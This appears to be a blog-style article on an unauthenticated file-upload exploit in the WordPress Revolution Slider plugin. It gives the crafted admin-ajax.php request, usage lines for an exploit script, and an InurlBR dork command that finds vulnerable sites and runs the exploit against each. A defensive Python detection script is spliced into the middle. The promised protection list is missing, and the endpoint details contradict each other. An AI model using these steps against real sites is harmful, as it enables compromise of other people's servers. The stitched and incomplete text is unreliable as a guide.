In the realm of WordPress security, vulnerabilities in plugins can lead to significant risks for website owners. One such vulnerability is found in the popular Revolution Slider plugin, which can allow for unauthorized file uploads. This article will delve into the details of this exploit, how it works, and what can be done to protect your WordPress site.
The Revolution Slider plugin has been known to contain an exploit that allows for unrestricted file uploads to the server. This flaw occurs in affected versions due to inadequate checks on user permissions when handling file uploads via AJAX requests.
The exploit takes advantage of the admin-ajax.php endpoint, allowing an attacker to upload malicious files by directly invoking specific AJAX actions without proper authentication. The key action in this scenario is revslider_ajax_action.
To facilitate the exploit, a specific request can be crafted as follows:
array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => _YOU_HTML_);
The payload is typically sent as a POST request to:
http://{target}/wp-admin/admin-ajax.php
To modify it for exploit purposes, the endpoint becomes:
http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
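The request pattern described above can be matched on the defender's side. The following Python code is an added example, not code from the original article or from the plugin. The record format (src, uri, post, cookies) is a hypothetical decoded audit-log shape, and a missing wordpress_logged_in_ cookie is used only as a heuristic for an anonymous request.

```python
from urllib.parse import parse_qs, urlsplit

# Endpoint, action and client_action values are the ones named in the article.
ENDPOINT = "/wp-admin/admin-ajax.php"
ACTION = "revslider_ajax_action"
CLIENT_ACTIONS = {"update_captions_css": "write", "get_captions_css": "read"}
# WordPress login cookies start with this prefix; its presence is only a hint.
AUTH_COOKIE_PREFIX = "wordpress_logged_in_"

def request_params(record):
    """Merge query-string and decoded POST parameters (POST values win)."""
    query = parse_qs(urlsplit(record["uri"]).query, keep_blank_values=True)
    params = {name: values[-1] for name, values in query.items()}
    params.update(record.get("post", {}))
    return params

def classify(record):
    """Return a finding string for a matching anonymous request, else None."""
    if not urlsplit(record["uri"]).path.endswith(ENDPOINT):
        return None
    params = request_params(record)
    kind = CLIENT_ACTIONS.get(params.get("client_action"))
    if params.get("action") != ACTION or kind is None:
        return None
    if any(c.startswith(AUTH_COOKIE_PREFIX) for c in record.get("cookies", [])):
        return None  # possibly an administrator session; review separately
    return f"anonymous {kind} via {params['client_action']} from {record['src']}"

def scan(records):
    """Classify every record and keep only the findings."""
    return [finding for finding in map(classify, records) if finding]

# Constructed sample records (hypothetical format, documentation IP ranges).
SAMPLE = [
    {"src": "203.0.113.7", "uri": "/wp-admin/admin-ajax.php", "cookies": [],
     "post": {"action": ACTION, "client_action": "update_captions_css",
              "data": "constructed-body"}},
    {"src": "203.0.113.7", "cookies": [],
     "uri": "/blog/wp-admin/admin-ajax.php?action=revslider_ajax_action"
            "&client_action=get_captions_css"},
    {"src": "198.51.100.4", "uri": "/wp-admin/admin-ajax.php",
     "cookies": ["wordpress_logged_in_constructed"],
     "post": {"action": ACTION, "client_action": "update_captions_css"}},
    {"src": "198.51.100.9", "uri": "/wp-admin/admin-ajax.php", "cookies": [],
     "post": {"action": "heartbeat"}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Plain access logs do not record POST bodies, so the first sample record is only detectable where request parameters are logged or inspected in-line.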
To execute the exploit, certain command parameters can be utilized:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
A tool called InurlBR can assist in identifying vulnerable targets efficiently. The following command is an example:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --command-all 'php inurl_revslider.php -t _TARGET_'
To protect against this exploit, follow these best practices:
The vulnerability in the Revolution Slider plugin serves as a reminder of the importance of maintaining secure WordPress setups. Understanding the exploit and implementing preventive measures will help protect your website from potential attacks.